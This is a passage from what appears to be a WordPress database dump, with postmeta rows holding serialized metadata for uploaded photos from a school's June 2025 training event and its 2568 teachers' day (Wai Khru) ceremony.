(3714,1321,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:124:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11.jpg\";s:8:\"filesize\";i:348767;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18539;}s:5:\"large\";a:5:{s:4:\"file\";s:125:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:133801;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7291;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84577;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_11-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20432;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3715,1322,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8.jpg'),
(3716,1322,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:123:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8.jpg\";s:8:\"filesize\";i:348299;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18910;}s:5:\"large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135973;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7709;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86396;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_8-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21098;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3717,1323,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7.jpg'),
(3718,1323,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:123:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7.jpg\";s:8:\"filesize\";i:319628;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17537;}s:5:\"large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122228;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7044;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77420;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_7-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17401;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3719,1324,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5.jpg'),
(3720,1324,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:123:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5.jpg\";s:8:\"filesize\";i:348707;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19015;}s:5:\"large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136323;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7940;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86367;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_5-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21004;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3721,1325,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6.jpg'),
(3722,1325,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:123:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6.jpg\";s:8:\"filesize\";i:335594;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18106;}s:5:\"large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:128070;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7316;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80691;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_6-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19608;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3723,1326,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4.jpg'),
(3724,1326,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:123:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4.jpg\";s:8:\"filesize\";i:355179;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19577;}s:5:\"large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139067;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8089;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88331;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21584;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3725,1327,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3.jpg'),
(3726,1327,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:123:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3.jpg\";s:8:\"filesize\";i:361614;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19659;}s:5:\"large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:140937;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7979;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:89486;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21608;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3727,1328,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2.jpg'),
(3728,1328,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1108;s:6:\"height\";i:1477;s:4:\"file\";s:123:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2.jpg\";s:8:\"filesize\";i:328906;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16389;}s:5:\"large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125246;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7414;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2-768x1024.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:125246;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20751;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3729,1329,'_wp_attached_file','2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1.jpg'),
(3730,1329,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:123:\"2025/06/LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1.jpg\";s:8:\"filesize\";i:409477;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21722;}s:5:\"large\";a:5:{s:4:\"file\";s:124:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:158813;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9016;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100429;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:123:\"LINE_ALBUM_อบรม-กสทชส่งเาริมการออกกำลังกาย_250609_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23622;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3732,1317,'_thumbnail_id','1326'),
(3733,1317,'_edit_last','1'),
(3734,1317,'title_style','default'),
(3735,1317,'_title_style','field_5d1a0217cf408'),
(3736,1317,'related',''),
(3737,1317,'_related','field_603b51c3e183e'),
(3738,1330,'title_style','default'),
(3739,1330,'_title_style','field_5d1a0217cf408'),
(3740,1330,'related',''),
(3741,1330,'_related','field_603b51c3e183e'),
(3742,1331,'title_style','default'),
(3743,1331,'_title_style','field_5d1a0217cf408'),
(3744,1332,'title_style','default'),
(3745,1332,'_title_style','field_5d1a0217cf408'),
(3746,1333,'_edit_lock','1749790993:1'),
(3747,1334,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_1.jpg'),
(3748,1334,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_1.jpg\";s:8:\"filesize\";i:293717;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22455;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131538;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9091;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87878;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22667;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3749,1335,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_3.jpg'),
(3750,1335,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_3.jpg\";s:8:\"filesize\";i:346160;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_3-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19827;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_3-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:138312;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8054;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_3-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88602;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20719;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3751,1336,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_5.jpg'),
(3752,1336,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1280;s:6:\"height\";i:721;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_5.jpg\";s:8:\"filesize\";i:265870;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_5-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15536;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันไหว้ครู-2568_250613_5-1024x577.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:577;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:119268;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8495;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_5-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75027;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันไหว้ครู-2568_250613_5-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19869;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3753,1337,'_wp_attached_file','2025/06/LINE_ALBUM_วันไหว้ครู-2568_250613_6.jpg'),
